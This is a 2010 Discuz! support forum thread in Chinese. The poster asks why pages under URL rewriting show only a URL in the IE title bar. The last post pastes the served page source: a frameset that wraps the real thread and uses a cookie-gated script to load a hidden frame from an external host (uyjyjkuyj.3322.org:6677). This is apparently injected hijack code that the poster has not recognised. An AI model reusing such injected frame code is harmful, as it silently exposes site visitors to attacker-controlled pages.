Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索

急。。。在浏览论坛时IE的标题栏没有相应贴子主题显示。只有一串网址

[复制链接]
cnmt4 发表于 2010-6-1 13:34:16 | 显示全部楼层 |阅读模式
急。。。在浏览论坛时IE的标题栏没有相应贴子主题显示。只有一串网址。在伪静态下.是这个样..如果不用伪静态就正常.IE6.和IE7都一样.
这是刚发现的.原来一直使用正常.....修复数据库,没发现表有错误的...也更新缓存了..也重启服务器了...还这样...除了这个外别的一切正常.

没装任何插件.也一直没动...伪静态一直在用.....大家帮助一下.谢谢.

用的伪静态是.

<IfModule mod_rewrite.c>
                RewriteEngine On
                RewriteRule ^(.*)/archiver/((fid|tid)-[\w\-]+\.html)$ $1/archiver/index.php?$2
                RewriteRule ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay.php?fid=$2&page=$3
                RewriteRule ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/viewthread.php?tid=$2&extra=page\%3D$4&page=$3
                RewriteRule ^(.*)/space-(username|uid)-(.+)\.html$ $1/space.php?$2=$3
                RewriteRule ^(.*)/tag-(.+)\.html$ $1/tag.php?name=$2
        </IfModule>
回复

使用道具 举报

 楼主| cnmt4 发表于 2010-6-1 13:34:35 | 显示全部楼层
换了电脑也这样.
回复

使用道具 举报

 楼主| cnmt4 发表于 2010-6-1 13:36:06 | 显示全部楼层
就论坛有这个问题.其它好用.
回复

使用道具 举报

 楼主| cnmt4 发表于 2010-6-1 13:46:21 | 显示全部楼层
源文件里全是
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://uyjyjkuyj.3322.org:6677/9/index.html";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/bbs/thread-2222-1-1.html?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-8-30 01:08 , Processed in 0.091361 second(s), 14 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表